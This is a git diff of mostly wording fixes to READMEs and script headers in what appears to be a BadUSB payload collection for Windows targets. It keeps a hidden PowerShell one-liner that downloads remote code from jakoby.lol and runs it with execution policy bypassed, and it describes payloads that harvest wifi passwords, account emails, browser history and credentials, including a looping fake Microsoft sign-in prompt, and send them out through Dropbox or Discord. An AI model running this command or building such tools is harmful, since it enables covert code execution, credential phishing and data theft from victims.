diff --git a/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 b/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 index 4c3b3ba..f7e7dcf 100644 --- a/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 +++ b/Payloads/Flip-ADV-Recon/ADV-Recon.ps1 @@ -19,13 +19,13 @@ <# .SYNOPSIS - This is an advanced recon of a target PC and exfiltration of that data + This is an advanced recon of a target PC and exfiltration of that data. .DESCRIPTION - This program gathers details from target PC to include everything you could imagine from wifi passwords to PC specs to every process running - All of the gather information is formatted neatly and output to a file - That file is then exfiltrated to cloud storage via DropBox + This program gathers details from target PC to include everything you could imagine from wifi passwords to PC specs to every process running. + All of the gather information is formatted neatly and output to a file. + That file is then exfiltrated to cloud storage via Dropbox. .Link - https://developers.dropbox.com/oauth-guide # Guide for setting up your DropBox for uploads + https://developers.dropbox.com/oauth-guide # Guide for setting up your Dropbox for uploads https://www.youtube.com/watch?v=Zs-1j42ySNU # My youtube tutorial on Discord Uploads https://www.youtube.com/watch?v=VPU7dFzpQrM # My youtube tutorial on Dropbox Uploads #> diff --git a/Payloads/Flip-ADV-Recon/ADV-Recon.txt b/Payloads/Flip-ADV-Recon/ADV-Recon.txt index 66c2318..f9e5f5d 100644 --- a/Payloads/Flip-ADV-Recon/ADV-Recon.txt +++ b/Payloads/Flip-ADV-Recon/ADV-Recon.txt @@ -2,7 +2,7 @@ REM Title: ADV-Recon REM Author: I am Jakoby -REM Description: This payload is meant to do an advanced recon of the targets PC. See README.md file for more details. +REM Description: This payload is meant to do an advanced recon of the target's PC. See README.md file for more details. REM Target: Windows 10, 11 @@ -10,4 +10,3 @@ GUI r DELAY 500 STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';iwr jakoby.lol/aucrjmf | iex ENTER - diff --git a/Payloads/Flip-ADV-Recon/README.md b/Payloads/Flip-ADV-Recon/README.md index 8eb8857..8ebb0db 100644 --- a/Payloads/Flip-ADV-Recon/README.md +++ b/Payloads/Flip-ADV-Recon/README.md @@ -15,7 +15,7 @@ # ADV-Recon -A script used to do an advanced level of Recon on the targets computer. +A script used to do an advanced level of recon on the target's computer. Version 2 no longer requires you to host your own version of the script. @@ -25,11 +25,11 @@ Modifying the execution script is the only necessary interaction. This program enumerates a target PC to collect as much recon data as possible for future engagements. This includes: -* Hosts Powershell Version (to know what commands can be run) -* Name Associated with their Microsoft Account (Or ENV UserName variable if one is not detected) +* Hosts PowerShell Version (to know what commands can be run) +* Name associated with their Microsoft account (Or ENV UserName variable if one is not detected) * Whether they are in the Admin group or not -* The email associated with their Microsoft Account (for phishing possibilities) -* Other User accounts on their system (for possible privledge escalation) +* The email associated with their Microsoft account (for phishing possibilities) +* Other User accounts on their system (for possible privilege escalation) * Details on their login settings (Ex: Min/Max password age and length) * How many days since they have changed their password (Max password age - Days since = Opportunity) * Their GeoLocation (know their approximate where abouts) @@ -39,7 +39,7 @@ This program enumerates a target PC to collect as much recon data as possible fo * Network Interfaces (What are they connecting in and out with) * System Information (Manufacturer, Model, Serial Number, OS, CPU, RAM, Mainboard BIOS) * Local Users (Accounts on system with Username, name associated with microsoft account and SID) -* Information on their HardDrives (Indicator of Recon Scope) +* Information on their hard drives (Indicator of Recon Scope) * COM and Serial Devices (Is there a device connected you can manipulate?) * Active TCP Connections (Poor mans Port Scanning) * Processes, Services, Software, and Drivers (What is running on the computer we can exploit?) @@ -50,7 +50,7 @@ This program enumerates a target PC to collect as much recon data as possible fo ### Dependencies -* DropBox or Discord +* Dropbox or Discord * Windows 10,11
diff --git a/Payloads/Flip-ADV-RickRoll/ADV-RickRoll.txt b/Payloads/Flip-ADV-RickRoll/ADV-RickRoll.txt index 72efffd..9e0e0d1 100644 --- a/Payloads/Flip-ADV-RickRoll/ADV-RickRoll.txt +++ b/Payloads/Flip-ADV-RickRoll/ADV-RickRoll.txt @@ -2,8 +2,8 @@ REM Title: ADV-RickRoll REM Author: I am Jakoby -REM Description: This is a one liner payload that will Rick Roll your target. Video will be played a full screen and max volume. -REM Upon deployment payload will pause until a mouse movement is detected and run once one is. +REM Description: This is a one liner payload that will Rick Roll your target. Video will be played at full screen and max volume. +REM Upon deployment, payload will pause until a mouse movement is detected and run once one is. REM Target: Windows 10, 11 diff --git a/Payloads/Flip-ADV-RickRoll/ReadMe.md b/Payloads/Flip-ADV-RickRoll/ReadMe.md index 0698cc5..77ba9e9 100644 --- a/Payloads/Flip-ADV-RickRoll/ReadMe.md +++ b/Payloads/Flip-ADV-RickRoll/ReadMe.md @@ -23,7 +23,7 @@ # ADV-RickRoll -A script used to do an advanced rick roll on your target +A script used to do an advanced rick roll on your target. ## Description diff --git a/Payloads/Flip-AcidBurn/README.md b/Payloads/Flip-AcidBurn/README.md index c8e51e9..a89c5e8 100644 --- a/Payloads/Flip-AcidBurn/README.md +++ b/Payloads/Flip-AcidBurn/README.md @@ -15,17 +15,17 @@ # Acid Burn -A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes. +A script I put together to torment Call Center Scammers but can be used on your friends as well...or foes. ## Description -This program enumerates a target PC to include Operating System, RAM Capacity, Public IP, and Email associated with microsoft account. +This program enumerates a target PC to include Operating System, RAM Capacity, Public IP, and Email associated with the Microsoft account. The SSID and WiFi password of any current or previously connected to networks. -It determines the last day they changed thier password and how many days ago. -Once the information is gathered the script will pause until a mouse movement is detected -Then the script uses Sapi speak to roast their set up and lack of security -If wifi networks and passwords are detected wallpaper will be changed to image displaying that information -Image generated will be saved to desktop, steganography is used to put hidden message at bottom of binary output of image generated +It determines the last day they changed their password and how many days ago. +Once the information is gathered, the script will pause until a mouse movement is detected. +Then, the script uses Sapi speak to roast their set up and lack of security. +If wifi networks and passwords are detected, the wallpaper will be changed to an image displaying that information. +The generated image will be saved to the desktop and steganography is used to put a hidden message at the bottom of the binary output of the generated image. ## Getting Started diff --git a/Payloads/Flip-BrowserData/README.md b/Payloads/Flip-BrowserData/README.md index bcab523..cc215a5 100644 --- a/Payloads/Flip-BrowserData/README.md +++ b/Payloads/Flip-BrowserData/README.md @@ -22,9 +22,9 @@ ## Description -This payload can be used to retrieve the browsing history and bookmarks from edge, chrome, and firefox (no bookmarks from firefox currently) +This payload can be used to retrieve the browsing history and bookmarks from Edge, Chrome, Opera GX, and Firefox (no bookmarks from firefox currently). -They are then exfiled using either discord or dropbox +They are then exfiled using either Discord or Dropbox. ## The Function diff --git a/Payloads/Flip-BrowserData/browserData.txt b/Payloads/Flip-BrowserData/browserData.txt index 0a584b0..7abfc2b 100644 --- a/Payloads/Flip-BrowserData/browserData.txt +++ b/Payloads/Flip-BrowserData/browserData.txt @@ -2,7 +2,7 @@ REM Title: Browser-Data REM Author: I am Jakoby -REM Description: This payload will grab your targets brosing history and bookmarks from IE, Chrome, and Firefox +REM Description: This payload will grab your targets brosing history and bookmarks from IE, Chrome, Firefox, and Opera GX. REM Target: Windows 10, 11 diff --git a/Payloads/Flip-Credz-Plz/Credz-Plz-Execute.txt b/Payloads/Flip-Credz-Plz/Credz-Plz-Execute.txt index 4020a9f..e7a2997 100644 --- a/Payloads/Flip-Credz-Plz/Credz-Plz-Execute.txt +++ b/Payloads/Flip-Credz-Plz/Credz-Plz-Execute.txt @@ -2,7 +2,9 @@ REM Title: Credz-Plz REM Author: I am Jakoby -REM Description: This payload is meant to prompt the target to enter their creds to later be exfiltrated with dropbox. See README.md file for more details. +REM Description: This payload prompts the target to enter their creds to later be exfiltrated with either Dropbox or a Discord webhook. + +REM See README.md file for more details. REM Target: Windows 10, 11 diff --git a/Payloads/Flip-Credz-Plz/Credz-Plz.ps1 b/Payloads/Flip-Credz-Plz/Credz-Plz.ps1 index dada758..58f6df9 100644 --- a/Payloads/Flip-Credz-Plz/Credz-Plz.ps1 +++ b/Payloads/Flip-Credz-Plz/Credz-Plz.ps1 @@ -25,7 +25,7 @@ A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account" This will be followed by a fake authentication ui prompt. If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up - Once the target enters their credentials their information will be uploaded to your dropbox for collection + Once the target enters their credentials their information will be uploaded to either your Dropbox or Discord webhook for collection .Link https://developers.dropbox.com/oauth-guide # Guide for setting up your DropBox for uploads diff --git a/Payloads/Flip-Credz-Plz/README.md b/Payloads/Flip-Credz-Plz/README.md index b61c1fe..3e178d6 100644 --- a/Payloads/Flip-Credz-Plz/README.md +++ b/Payloads/Flip-Credz-Plz/README.md @@ -15,18 +15,18 @@ # Credz-Plz -A script used to prompt the target to enter their creds to later be exfiltrated with dropbox. +A script used to prompt the target to enter their creds to later be exfiltrated with either Dropbox or a Discord webhook. ## Description A pop up box will let the target know "Unusual sign-in. Please authenticate your Microsoft Account". This will be followed by a fake authentication ui prompt. If the target tried to "X" out, hit "CANCEL" or while the password box is empty hit "OK" the prompt will continuously re pop up. -Once the target enters their credentials their information will be uploaded to your dropbox for collection. +Once the target enters their credentials their information will be uploaded to your Dropbox or Discord webhook for collection. - + - + ## Getting Started diff --git a/Payloads/Flip-Credz-Plz/authentication.jpg b/Payloads/Flip-Credz-Plz/authentication.jpg new file mode 100644 index 0000000..8e16d44 Binary files /dev/null and b/Payloads/Flip-Credz-Plz/authentication.jpg differ diff --git a/Payloads/Flip-Credz-Plz/sign-in.jpg b/Payloads/Flip-Credz-Plz/sign-in.jpg index 3330e2a..b719a8a 100644 Binary files a/Payloads/Flip-Credz-Plz/sign-in.jpg and b/Payloads/Flip-Credz-Plz/sign-in.jpg differ diff --git a/Payloads/Flip-Credz-Plz/unusual-sign-in.jpg b/Payloads/Flip-Credz-Plz/unusual-sign-in.jpg deleted file mode 100644 index ff0aad9..0000000 Binary files a/Payloads/Flip-Credz-Plz/unusual-sign-in.jpg and /dev/null differ diff --git a/Payloads/Flip-JumpScare-2.0/ReadMe.md b/Payloads/Flip-JumpScare-2.0/ReadMe.md index a85180e..012078d 100644 --- a/Payloads/Flip-JumpScare-2.0/ReadMe.md +++ b/Payloads/Flip-JumpScare-2.0/ReadMe.md @@ -23,7 +23,7 @@ # JumpScare 2.0 -A script used to jumpscare your target +A script used to jumpscare your target. ## Description @@ -31,7 +31,7 @@ This script will jumpscare your target. A jumpscare video will be downloaded to their temp directory. -When a mouse movement is detected that video will be played in the powershell console at max volume and fullscreen. +When a mouse movement is detected, that video will be played in the PowerShell console at max volume and fullscreen. ## Getting Started diff --git a/Payloads/Flip-JumpScare/README.md b/Payloads/Flip-JumpScare/README.md index 921a692..6eed6ef 100644 --- a/Payloads/Flip-JumpScare/README.md +++ b/Payloads/Flip-JumpScare/README.md @@ -15,7 +15,7 @@ # JumpScare -A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes. +A script I put together to torment Call Center Scammers but can be used on your friends as well...or foes. ## Description diff --git a/Payloads/Flip-MustSub/Readme.md b/Payloads/Flip-MustSub/Readme.md index 088711b..6a01c8e 100644 --- a/Payloads/Flip-MustSub/Readme.md +++ b/Payloads/Flip-MustSub/Readme.md @@ -23,7 +23,7 @@ # Must Sub -A script used to get your target to subscribe to 15 of my favorite hacker youtube channels +A script used to get your target to subscribe to 15 of my favorite hacker YouTube channels. ## Description diff --git a/Payloads/Flip-PS-Draw/README.md b/Payloads/Flip-PS-Draw/README.md index 8c9aea0..667cd39 100644 --- a/Payloads/Flip-PS-Draw/README.md +++ b/Payloads/Flip-PS-Draw/README.md @@ -15,20 +15,20 @@ # PS-Draw -A script used to generate and draw images in the Powershell Window, used to leave a signature or perhaps taunt victims +A script used to generate and draw images in the PowerShell window, used to leave a signature or perhaps taunt victims. ## Description -These two programs use two different method to draw out images in the Powershell Window. +These two programs use two different methods to draw out images in the PowerShell window. PS-Draw will convert an image you download into a BMP file, estimate the colors used based off the 16 available powershell colors, -then draw your image out in the powershell window. This process is not exact and needs testing of multiple images to find one that works well. +then draw your image out in the PowerShell window. This process is not exact and needs testing of multiple images to find one that works well. -PS-Custom-Draw generates images to be drawn in the Powershell Window based off pre-configured arrays I put together already included in the file itself. +PS-Custom-Draw generates images to be drawn in the PowerShell window based off pre-configured arrays I put together already included in the file itself. These images look significantly cleaner due to the fact they were drawn and coded specifically for this purpose. After the images are generated, a greeting will be generated by grabbing either the name associated with the registered Microsoft account or the -UserName environment variable. The script will then be paused until a mouse movement is detected at which time the pre-selected image will be drawn out in the powershell window. +UserName environment variable. The script will then be paused until a mouse movement is detected at which time the pre-selected image will be drawn out in the PowerShell window. ## Getting Started diff --git a/Payloads/Flip-PineApple/README.md b/Payloads/Flip-PineApple/README.md index 2c86139..67f48d4 100644 --- a/Payloads/Flip-PineApple/README.md +++ b/Payloads/Flip-PineApple/README.md @@ -15,13 +15,13 @@ # PineApple -A script used to connect a targets PC to your wifi PineApple +A script used to connect a targets PC to your Wifi PineApple. ## Description This program will generate an XML file that will be used to create a network profile for your Wifi PineApple. -The XML file will be manually entered into a Powershell window. -The Powershell window and run box will be erased for a clean exit. +The XML file will be manually entered into a PowerShell window. +The PowerShell window and run box will be erased for a clean exit. ## Getting Started diff --git a/Payloads/Flip-Play-WAV/README.md b/Payloads/Flip-Play-WAV/README.md index f80f0a1..b2fa80c 100644 --- a/Payloads/Flip-Play-WAV/README.md +++ b/Payloads/Flip-Play-WAV/README.md @@ -15,14 +15,14 @@ # Play-WAV -A script used to download a WAV file and play it after a mouse movement is detected +A script used to download a WAV file and play it after a mouse movement is detected. ## Description This program starts off by using an Invoke-WebRequest to download a WAV file. The system volume is then turned up to the max level. Then the script will be paused until a mouse movement is detected. -After one is the WAV file will be played. +After a mouse movement is detected, the WAV file will be played. ## Getting Started @@ -34,7 +34,7 @@ After one is the WAV file will be played. ### Executing program -* Place the WAV Url in the $wav variable +* Place the WAV URL in the $wav variable * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download your WAV file diff --git a/Payloads/Flip-Rage-PopUps/README.md b/Payloads/Flip-Rage-PopUps/README.md index 6c54e81..7885087 100644 --- a/Payloads/Flip-Rage-PopUps/README.md +++ b/Payloads/Flip-Rage-PopUps/README.md @@ -15,11 +15,11 @@ # Rage-PopUps -A script I put together to torment Call Center Scammers but can be used on your friends as well.. or Foes. +A script I put together to torment Call Center Scammers but can be used on your friends as well...or foes. ## Description -This program will open a series of pop up boxes with insults in a loop that repeats as many times as you set it to. +This program will open a series of pop-up boxes with insults in a loop that repeats as many times as you set it to. There is a section in the Rage-PopUps.ps1 file where you insert your own insults or use the ones provided. ## Getting Started diff --git a/Payloads/Flip-Rage-PopUps/Rage-PopUps.ps1 b/Payloads/Flip-Rage-PopUps/Rage-PopUps.ps1 index 53d0cc1..ae5d6bf 100644 --- a/Payloads/Flip-Rage-PopUps/Rage-PopUps.ps1 +++ b/Payloads/Flip-Rage-PopUps/Rage-PopUps.ps1 @@ -19,10 +19,10 @@ <# .SYNOPSIS - This script will open a series of pop ups in order to taunt your target. I wrote it initially to target call center scammers + This script will open a series of pop-ups in order to taunt your target. I wrote it initially to target call center scammers. .DESCRIPTION - This program is to taunt your target. Below are a series insults you can modify as you like. The program will generate a PopUp + This program is meant to taunt your target. Below are a series insults you can modify as you like. The program will generate a Pop-up for each one of them. #> diff --git a/Payloads/Flip-ShortcutJacker/README.md b/Payloads/Flip-ShortcutJacker/README.md index 0592e9e..47e50af 100644 --- a/Payloads/Flip-ShortcutJacker/README.md +++ b/Payloads/Flip-ShortcutJacker/README.md @@ -30,23 +30,23 @@